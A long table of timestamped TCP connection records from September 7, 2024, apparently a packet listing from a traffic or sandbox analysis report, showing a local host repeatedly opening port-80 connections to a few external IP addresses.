                                                                                                                                                                                                            Sep 7, 2024 15:37:09.559046984 CEST8056455172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.079087973 CEST8056455172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.079211950 CEST5645580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.080264091 CEST5645380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.080823898 CEST5645680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.081526995 CEST8056455172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.081588030 CEST5645580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.087203979 CEST8056453172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.087387085 CEST8056456172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.087471962 CEST5645380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.087488890 CEST5645680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.089884043 CEST5645680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.095716953 CEST8056456172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.582619905 CEST8056456172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:10.582690954 CEST5645680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.273763895 CEST5645780192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.278712988 CEST805645745.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.278775930 CEST5645780192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.278868914 CEST5645780192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.283746004 CEST5645880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.284411907 CEST805645745.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.284454107 CEST5645780192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.289397955 CEST8056458172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.289473057 CEST5645880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.304292917 CEST5645880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.316004992 CEST8056458172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.787091017 CEST8056458172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.787271023 CEST5645880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.787524939 CEST8056458172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.787573099 CEST5645880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.799592018 CEST5645680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.799876928 CEST5645980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.804982901 CEST8056456172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.805032969 CEST5645680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.805541039 CEST8056459172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.805605888 CEST5645980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.806472063 CEST5645980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:11.811291933 CEST8056459172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.330804110 CEST8056459172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.332660913 CEST5645980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.445915937 CEST5646080192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.451261997 CEST805646064.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.451369047 CEST5646080192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.460419893 CEST5646080192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.464050055 CEST5646180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.469417095 CEST805646064.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.469513893 CEST5646080192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.471736908 CEST8056461172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.471822023 CEST5646180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.471885920 CEST5646180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.477191925 CEST8056461172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.967535973 CEST8056461172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.967992067 CEST8056461172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.968064070 CEST5646180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.968122959 CEST5646180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.968336105 CEST5645980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.968616009 CEST5646280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.973846912 CEST8056462172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.973973989 CEST8056459172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.974057913 CEST5645980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.974057913 CEST5646280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.974215984 CEST5646280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:12.979389906 CEST8056462172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.466655016 CEST8056462172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.466718912 CEST5646280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.572218895 CEST5646380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.745242119 CEST805646345.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.745321989 CEST5646380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.745421886 CEST5646380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.750674009 CEST805646345.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.750726938 CEST5646380192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.766073942 CEST5646480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.770930052 CEST8056464172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.771027088 CEST5646480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.772970915 CEST5646480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:13.778408051 CEST8056464172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.255785942 CEST8056464172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.255913973 CEST5646480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.256156921 CEST5646280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.256356955 CEST8056464172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.256407976 CEST5646480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.256704092 CEST5646580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.261395931 CEST8056462172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.261445999 CEST5646280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.261629105 CEST8056465172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.261775970 CEST5646580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.261928082 CEST5646580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.266976118 CEST8056465172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.759955883 CEST8056465172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:14.760158062 CEST5646580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.165597916 CEST5646680192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.170593023 CEST805646688.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.170670986 CEST5646680192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.170749903 CEST5646680192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.176070929 CEST805646688.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.176124096 CEST5646680192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.213711023 CEST5646780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.218586922 CEST8056467172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.218682051 CEST5646780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.226314068 CEST5646780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.231189966 CEST8056467172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.706095934 CEST8056467172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.706633091 CEST8056467172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.706729889 CEST5646780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.706815004 CEST5646780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.708456993 CEST5646580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.708854914 CEST5646880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.713702917 CEST8056465172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.713979006 CEST8056468172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.714035034 CEST5646580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.714070082 CEST5646880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.714236021 CEST5646880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:17.719463110 CEST8056468172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.225856066 CEST8056468172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.225914955 CEST5646880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.774580002 CEST5646980192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.779618979 CEST805646945.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.779686928 CEST5646980192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.779810905 CEST5646980192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.785213947 CEST805646945.79.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.785279989 CEST5646980192.168.2.345.79.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.805481911 CEST5647080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.814621925 CEST8056470172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.814703941 CEST5647080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.819817066 CEST5647080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:18.829462051 CEST8056470172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.302743912 CEST8056470172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.302881956 CEST5647080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.302920103 CEST8056470172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.303128004 CEST5647080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.305196047 CEST5646880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.305759907 CEST5647180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.311721087 CEST8056468172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.311822891 CEST5646880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.311985016 CEST8056471172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.312056065 CEST5647180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.312237024 CEST5647180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.317789078 CEST8056471172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.808471918 CEST8056471172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.812829971 CEST5647180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.914104939 CEST5647280192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.919401884 CEST805647288.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.922187090 CEST5647280192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.929884911 CEST5647280192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.935215950 CEST805647288.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.935338020 CEST5647280192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.964346886 CEST5647380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.973159075 CEST8056473172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.973844051 CEST5647380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.976394892 CEST5647380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:19.981333017 CEST8056473172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.456821918 CEST8056473172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.458250999 CEST5647380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.458494902 CEST5647180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.458583117 CEST8056473172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.458839893 CEST5647480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.458859921 CEST5647380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.464313030 CEST8056474172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.464396000 CEST8056471172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.464411974 CEST5647480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.464446068 CEST5647180192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.464677095 CEST5647480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.470288992 CEST8056474172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.959916115 CEST8056474172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:20.960269928 CEST5647480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.398983002 CEST5647580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.404310942 CEST805647588.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.404432058 CEST5647580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.413538933 CEST5647580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.419048071 CEST805647588.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.419150114 CEST5647580192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.432610989 CEST5647680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.437722921 CEST8056476172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.437813997 CEST5647680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.437977076 CEST5647680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.443140984 CEST8056476172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.941586971 CEST8056476172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.941715002 CEST8056476172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.941716909 CEST5647680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.941761017 CEST5647680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.942203045 CEST5647480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.942503929 CEST5647780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.948211908 CEST8056474172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.948302984 CEST5647480192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.951694012 CEST8056477172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.951766014 CEST5647780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.951951981 CEST5647780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:21.960506916 CEST8056477172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:22.459160089 CEST8056477172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:22.460561037 CEST5647780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.586081028 CEST5647880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.591392994 CEST805647864.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.591461897 CEST5647880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.591535091 CEST5647880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.595093966 CEST5647980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.597143888 CEST805647864.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.597203970 CEST5647880192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.602567911 CEST8056479172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.602639914 CEST5647980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.602718115 CEST5647980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:23.609258890 CEST8056479172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.111764908 CEST8056479172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.111876011 CEST5647980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.112091064 CEST8056479172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.112137079 CEST5647980192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.130158901 CEST5647780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.130472898 CEST5648080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.135588884 CEST8056477172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.135849953 CEST8056480172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.135905981 CEST5647780192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.135950089 CEST5648080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.136897087 CEST5648080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.141726017 CEST8056480172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.625905991 CEST8056480172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.627125025 CEST5648080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.745393038 CEST5648180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.750516891 CEST805648188.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.753334999 CEST5648180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.753413916 CEST5648180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.759614944 CEST805648188.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.762190104 CEST5648180192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.765646935 CEST5648280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.770426989 CEST8056482172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.774185896 CEST5648280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.774308920 CEST5648280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:24.779103041 CEST8056482172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.261766911 CEST8056482172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.261925936 CEST5648280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.262280941 CEST5648080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.262315035 CEST8056482172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.262401104 CEST5648280192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.262686968 CEST5648380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.275729895 CEST8056480172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.275805950 CEST5648080192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.275995016 CEST8056483172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.276091099 CEST5648380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.276422977 CEST5648380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.285114050 CEST8056483172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.765440941 CEST8056483172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.765520096 CEST5648380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.867465019 CEST5648480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.872503996 CEST805648464.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.872591972 CEST5648480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.872658968 CEST5648480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.878595114 CEST805648464.70.19.203192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.878648996 CEST5648480192.168.2.364.70.19.203
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.893641949 CEST5648580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.898513079 CEST8056485172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.900401115 CEST5648580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.914150953 CEST5648580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:25.922756910 CEST8056485172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.407851934 CEST8056485172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.408029079 CEST5648580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.408459902 CEST8056485172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.408528090 CEST5648580192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.410260916 CEST5648380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.410559893 CEST5648680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.416399956 CEST8056483172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.416414022 CEST8056486172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.416471958 CEST5648380192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.416539907 CEST5648680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.416842937 CEST5648680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.423202038 CEST8056486172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.911992073 CEST8056486172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:26.912056923 CEST5648680192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.586719036 CEST5648780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.592916965 CEST805648788.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.592998028 CEST5648780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.593089104 CEST5648780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.599224091 CEST805648788.198.29.97192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.599330902 CEST5648780192.168.2.388.198.29.97
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.641525030 CEST5648880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.646943092 CEST8056488172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.650192022 CEST5648880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.650283098 CEST5648880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:27.655493975 CEST8056488172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:28.151307106 CEST8056488172.234.222.138192.168.2.3
                                                                                                                                                                                                            Sep 7, 2024 15:37:28.151443005 CEST5648880192.168.2.3172.234.222.138
                                                                                                                                                                                                            Sep 7, 2024 15:37:28.151690960 CEST5648680192.168.2.3172.234.222.138
